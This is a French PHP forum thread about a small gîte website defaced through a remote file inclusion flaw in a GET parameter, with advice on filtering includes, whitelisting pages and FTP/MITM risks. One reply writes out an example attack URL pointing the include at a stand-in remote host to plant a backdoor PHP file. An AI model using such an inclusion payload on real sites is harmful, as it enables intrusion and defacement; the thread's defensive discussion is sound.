IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

Faille de sécurité dans mon site


Sujet :

Langage PHP

  1. #21
    Membre expert
    Avatar de s.n.a.f.u
    Homme Profil pro
    Développeur Web
    Inscrit en
    Août 2006
    Messages
    2 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Août 2006
    Messages : 2 760
    Points : 3 545
    Points
    3 545
    Par défaut
    Citation Envoyé par gitedoublel Voir le message
    AAAAAAAAAAAAAAAAAAAAh!!!!!!!!!!
    Je pète un plomb! Ca a recommencé!
    mais comment font-ils?
    Il y a une faille possible avec le code de snafu?
    Ce code était vraiment basique, donc pas forcément à l'épreuve des balles. Il me semblait pourtant suffisant.
    Il serait effectivement nécessaire d'avoir une page piratée pour que nous puissions vraiment diagnostiquer ton problème.
    • Avant de poser une question, n'hésitez pas à chercher dans la FAQ et les forums
    • Merci d'utiliser les balises de code (# dans l'éditeur)
    • N'oubliez pas de vous servir des boutons , et

    S.N.A.F.U

  2. #22
    Membre expert
    Avatar de s.n.a.f.u
    Homme Profil pro
    Développeur Web
    Inscrit en
    Août 2006
    Messages
    2 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Août 2006
    Messages : 2 760
    Points : 3 545
    Points
    3 545
    Par défaut
    Et avant de tout mettre sur le dos de l'include, penses à changer ton mot de passe FTP. S'ils l'ont, le reste ne sert à rien...
    • Avant de poser une question, n'hésitez pas à chercher dans la FAQ et les forums
    • Merci d'utiliser les balises de code (# dans l'éditeur)
    • N'oubliez pas de vous servir des boutons , et

    S.N.A.F.U

  3. #23
    Modérateur
    Avatar de sabotage
    Homme Profil pro
    Inscrit en
    Juillet 2005
    Messages
    29 208
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Juillet 2005
    Messages : 29 208
    Points : 44 155
    Points
    44 155
    Par défaut
    Je dirais même, changer de logiciel de FTP, analyser voir formater tous les postes qui se connectent au FTP.
    N'oubliez pas de consulter les FAQ PHP et les cours et tutoriels PHP

  4. #24
    Candidat au Club
    Inscrit en
    Juin 2009
    Messages
    18
    Détails du profil
    Informations forums :
    Inscription : Juin 2009
    Messages : 18
    Points : 2
    Points
    2
    Par défaut
    Bonjour!

    je ne me connecte au FTP que depuis un ordinateur, le mien.
    J'ai appelé OVH et ils m'ont dit que c'était toujours le même poste qui s'était connecté dans les 6 derniers mois... C'est eux qui m'ont dit que ça devait venir de mon include...
    Je sais pas...

  5. #25
    Modérateur
    Avatar de sabotage
    Homme Profil pro
    Inscrit en
    Juillet 2005
    Messages
    29 208
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Juillet 2005
    Messages : 29 208
    Points : 44 155
    Points
    44 155
    Par défaut
    Il suffit que tu consultes les logs de connexion et tu sauras si un paramètre suspect a été passé à ta page par l'url.

    Pour le FTP, on peut imaginer que ton logiciel soit infecté.
    N'oubliez pas de consulter les FAQ PHP et les cours et tutoriels PHP

  6. #26
    Membre expert
    Avatar de s.n.a.f.u
    Homme Profil pro
    Développeur Web
    Inscrit en
    Août 2006
    Messages
    2 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Août 2006
    Messages : 2 760
    Points : 3 545
    Points
    3 545
    Par défaut
    Après avoir eu l'accès ssh au site, j'ai rajouté ce code au début de la page qui inclus :

    code supprimé pour plus de discrétion

    • ouverture des urls distantes interdite
    • l'inclusion ne doit pas contenir ni http, ni ftp, ni un '\' ou un '/'
    • l'inclusion doit se terminer par html ou htm
    • le fichier doit exister au même niveau du système de fichier.


    J'ai également positionné les globales à "off" : elle étaient en marche et le $contenu n'était pas récupéré par GET.

    Petit plus : le log des tentatives d'injections est aussi consultable.

    Ca devrait tenir un peu plus, l'idéal étant de lister les pages autorisées, mais y a un peu de boulot à faire... Ils ont bien travaillé et y a beaucoup de pages.
    Et si ça ne tient pas, gageons que le hacker n'y arrivera pas du mpremier coup et que ses tentatives seront logguées, donc analysables.
    • Avant de poser une question, n'hésitez pas à chercher dans la FAQ et les forums
    • Merci d'utiliser les balises de code (# dans l'éditeur)
    • N'oubliez pas de vous servir des boutons , et

    S.N.A.F.U

  7. #27
    Candidat au Club
    Inscrit en
    Juin 2009
    Messages
    18
    Détails du profil
    Informations forums :
    Inscription : Juin 2009
    Messages : 18
    Points : 2
    Points
    2
    Par défaut
    Putain!

    c'est de la tuerie! Alors la, de ce que j'en comprend, ça parait sur sécurisé! Si on ne peut plus appeler de pages extérieures, plus appeler de page autres que html... ca parait carré!

    Pour répondre à sabotage et xunil, comme je l'ai dit de nombreuses fois je ne m'y conais pas bien, mais si il n'y a que mon ordinateur qui se connecte, et que toutes les pages sont statiques (html), il ne peut pas y avoir d'autre failles si?
    Seulement, en effet, si j'ai un virus sur mon ordi qui commandite tout le bordel...
    Ce qui me fait penser que ça vient de l'include, c'est qu'avant ça recommencait toutes les 24h en moyenne, avec le code de snafu, c'est resté normal 5-6 jours...

    Sinon le piratage affiche une page noire, avec marqué gite double l en blanc(c le nom de notre site), et après ça fait comme un faux moteur de recherche genre: 'you want to know more about gite double l ? try this links!
    Gite double l: free porn video
    gite double l: by a house easily!
    gite double l...

    Voila, c'est très embêtant...

    Donc snafu, maintenant je recopie ton code pour la version anglaise et l'autre site?

  8. #28
    Membre expert
    Avatar de s.n.a.f.u
    Homme Profil pro
    Développeur Web
    Inscrit en
    Août 2006
    Messages
    2 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Août 2006
    Messages : 2 760
    Points : 3 545
    Points
    3 545
    Par défaut
    Citation Envoyé par gitedoublel Voir le message
    Donc snafu, maintenant je recopie ton code pour la version anglaise et l'autre site?
    Pour la version anglaise, c'est fait.
    Je n'avais pas pensé à l'autre site, donc je te laisse faire.

    @+
    • Avant de poser une question, n'hésitez pas à chercher dans la FAQ et les forums
    • Merci d'utiliser les balises de code (# dans l'éditeur)
    • N'oubliez pas de vous servir des boutons , et

    S.N.A.F.U

  9. #29
    Membre expert
    Avatar de s.n.a.f.u
    Homme Profil pro
    Développeur Web
    Inscrit en
    Août 2006
    Messages
    2 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Août 2006
    Messages : 2 760
    Points : 3 545
    Points
    3 545
    Par défaut
    Citation Envoyé par gitedoublel Voir le message
    Ce qui me fait penser que ça vient de l'include, c'est qu'avant ça recommencait toutes les 24h en moyenne, avec le code de snafu, c'est resté normal 5-6 jours...
    J'aimerais bien qu'"ils" repassent un de ces jours, pour avoir le log de leurs tentatives afin d'en savoir plus.

    A suivre...
    • Avant de poser une question, n'hésitez pas à chercher dans la FAQ et les forums
    • Merci d'utiliser les balises de code (# dans l'éditeur)
    • N'oubliez pas de vous servir des boutons , et

    S.N.A.F.U

  10. #30
    Candidat au Club
    Inscrit en
    Juin 2009
    Messages
    18
    Détails du profil
    Informations forums :
    Inscription : Juin 2009
    Messages : 18
    Points : 2
    Points
    2
    Par défaut
    Bon, c'est fait pour l'autre site.
    Par contre, ce qui est un peu con, c'est que si on tape gitedoublel sur google, ce post arrive en deuxième position, la protection est donc plus ou moins publique...

  11. #31
    Membre expert
    Avatar de s.n.a.f.u
    Homme Profil pro
    Développeur Web
    Inscrit en
    Août 2006
    Messages
    2 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Août 2006
    Messages : 2 760
    Points : 3 545
    Points
    3 545
    Par défaut
    Citation Envoyé par gitedoublel Voir le message
    Bon, c'est fait pour l'autre site.
    Par contre, ce qui est un peu con, c'est que si on tape gitedoublel sur google, ce post arrive en deuxième position, la protection est donc plus ou moins publique...
    Exact, j'ai modifié mon post pour ne plus afficher le code.

    Bien vu
    • Avant de poser une question, n'hésitez pas à chercher dans la FAQ et les forums
    • Merci d'utiliser les balises de code (# dans l'éditeur)
    • N'oubliez pas de vous servir des boutons , et

    S.N.A.F.U

  12. #32
    Nouveau membre du Club
    Profil pro
    Inscrit en
    Novembre 2008
    Messages
    29
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Novembre 2008
    Messages : 29
    Points : 37
    Points
    37
    Par défaut
    Hello,
    Bon, pour le log de 19h40, c'est moi ... j'ai testé la réponse.

  13. #33
    FoxLeRenard
    Invité(e)
    Par défaut
    Bonjour les Amis,

    Désolé d'arriver sur une discution résolue , pour y apporter mon grain de sel,
    mais je voulais préciser quelques points que j'ais compris ici:

    Au départ je crois il n'existe aucune faille de FTP, surtout sur un bon serveur, qui aurait eu le code FTP et comment

    Alors le coupable ?
    Bien sur le trou énorme du GET, qui est donc résolu si j'ais bien compris

    Mais c 'est quoi ces fichiers PHP et d' ou vient' il ?

    Tout bétement que lorsqu'un serveur éxécute un PHP situé SUR le serveur, celui-ci a tout les droits
    du reste quand on voit comment PHPBB s'installe, crées des répertoires en change les protections, généres toutes les pages Mysql etc...

    Alors c' est simple il me faut mettre au moins un PHP SUR le serveur de gitedoublel

    Mais voyons il y était déjas ce PHP !!
    mapageprincipale.php

    puisque tout include dans un PHP ne fait qu'augmenter sa taille et son nombre d'instructions, mais son nom est le même et ses droit aussi bien sur


    Alors je fais
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    mapageprincipale.php?contenu=http://www.xxx.com/pirate.txt
    et dans pirate.txt j'écris le code de génération sur le serveur de mon PHP a moi qui m servira de porte d'entrée a tout ce que je veux !

    J'allais dire de ce fait que vos derniers codes sont inutiles,

    Par contre si vous tenez vraiment au GET alors appliquez la régle de s.n.a.f.u ou Sabotage mettez un simple code
    genre

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    mapageprincipale.php?contenu=18
    avec dans le php un array avec les noms des pages a inclure en fonction de la valeur reçue !

  14. #34
    mon_nom_est_personne
    Invité(e)
    Par défaut
    FoxLeRenard: As-tu deja entendu parler des attaque par le milieu ?

    D'apres guideinformatique.com il s'agit d'une "Attaque menée par un hacker qui se place entre deux ordinateurs en communication et se fait passer pour l’un deux afin d'obtenir le mot de passe de l'autre. Dès lors, il peut se retourner vers le premier avec un mot de passe valide et l'attaquer réellement."

    Comme en protocole ftp comme http, les mdp sont transmis sans encryption et que tu n'as pas de fingerprint, crois moi une connection ftp est un serieux troux de securite. C'est pour ca que les boites qui se soucies un peu de la securite utilisent sftp ou ssh pour connecter a leur serveur.

  15. #35
    Membre expert
    Avatar de s.n.a.f.u
    Homme Profil pro
    Développeur Web
    Inscrit en
    Août 2006
    Messages
    2 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Août 2006
    Messages : 2 760
    Points : 3 545
    Points
    3 545
    Par défaut
    L'essai d'explication du 9tailed est un bon début, je rajoute de la biblio :

    http://www.developpez.net/forums/d19...lus-courantes/

    http://php.developpez.com/faq/?page=securite

    http://php.developpez.com/faq/?page=...ire-faille-xss

    Au passage, j'ai interdit la balise script dans la sécurité du site...
    • Avant de poser une question, n'hésitez pas à chercher dans la FAQ et les forums
    • Merci d'utiliser les balises de code (# dans l'éditeur)
    • N'oubliez pas de vous servir des boutons , et

    S.N.A.F.U

  16. #36
    FoxLeRenard
    Invité(e)
    Par défaut
    Citation Envoyé par mon_nom_est_personne Voir le message
    FoxLeRenard: As-tu deja entendu parler des attaque par le milieu ?
    Oui l'Ami je connais bien, et nous avons donné il y a peut de temps (un mois ?) un shemat de ce mécanisme.
    http://fr.wikipedia.org/wiki/Attaque...omme_du_milieu
    http://www.lesnouvelles.net/articles...sms-contournee

    Mais tu sais bien que ces techniques c'est du haut de gamme tu t'en doute, alors je n'ais même pas imaginé une seconde que pour le petit web du coin un hackeur de ce niveau mette en place un systéme si complexe

  17. #37
    mon_nom_est_personne
    Invité(e)
    Par défaut
    oui c'est claire, mais dans le cas d'un hebergeur mutualise, c'est un bon deal a mettre en place parce qu'avec une pierre tu fais plusieurs millier de coups.

  18. #38
    FoxLeRenard
    Invité(e)
    Par défaut
    Citation Envoyé par mon_nom_est_personne Voir le message
    oui c'est claire, mais dans le cas d'un hebergeur mutualise, c'est un bon deal a mettre en place parce qu'avec une pierre tu fais plusieurs millier de coups.
    Oui assez OK, et ça existe, mais pour faire ça il faut des hackeurs haut de gamme !
    Bon OK toi tu fais ça le matin en te brossant les dents, mais bon quand même

  19. #39
    mon_nom_est_personne
    Invité(e)
    Par défaut
    hahahahaha, non non je suis incapable de mettre un truc comme ca en place comme tu l'as faut des hackers de haut niveau et je ne suis meme pas un dev de niveau moyen. C'est juste qu'il y a quelques temps au taff on a appris a nos depend que l'utilisation de ftp, c'est pas secure du tout loin de la meme.

  20. #40
    Candidat au Club
    Inscrit en
    Juin 2009
    Messages
    18
    Détails du profil
    Informations forums :
    Inscription : Juin 2009
    Messages : 18
    Points : 2
    Points
    2
    Par défaut
    Citation Envoyé par FoxLeRenard Voir le message
    Par contre si vous tenez vraiment au GET alors appliquez la régle de s.n.a.f.u ou Sabotage mettez un simple code
    genre

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    mapageprincipale.php?contenu=18
    avec dans le php un array avec les noms des pages a inclure en fonction de la valeur reçue !
    Si on veut pouvoir garder la possibilité d'appeler des pages extérieures! La solution de snafu est plus restrictive mais aussi efficace non?

+ Répondre à la discussion
Cette discussion est résolue.
Page 2 sur 4 PremièrePremière 1234 DernièreDernière

Discussions similaires

  1. [PHP 5.0] Faille de sécurité dans mon site
    Par AlTi5 dans le forum Langage
    Réponses: 24
    Dernier message: 12/02/2013, 22h37
  2. Réponses: 4
    Dernier message: 01/08/2012, 00h22
  3. Déterminer les failles de sécurités sur mon site
    Par whitespirit dans le forum EDI, CMS, Outils, Scripts et API
    Réponses: 2
    Dernier message: 05/06/2008, 07h36
  4. [MySQL] Comment créer une sous catégorie dans mon site ?
    Par plex dans le forum PHP & Base de données
    Réponses: 5
    Dernier message: 18/08/2006, 09h59
  5. Images dans mon site qui deforment tout
    Par warrendc dans le forum Balisage (X)HTML et validation W3C
    Réponses: 4
    Dernier message: 26/06/2006, 14h32

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo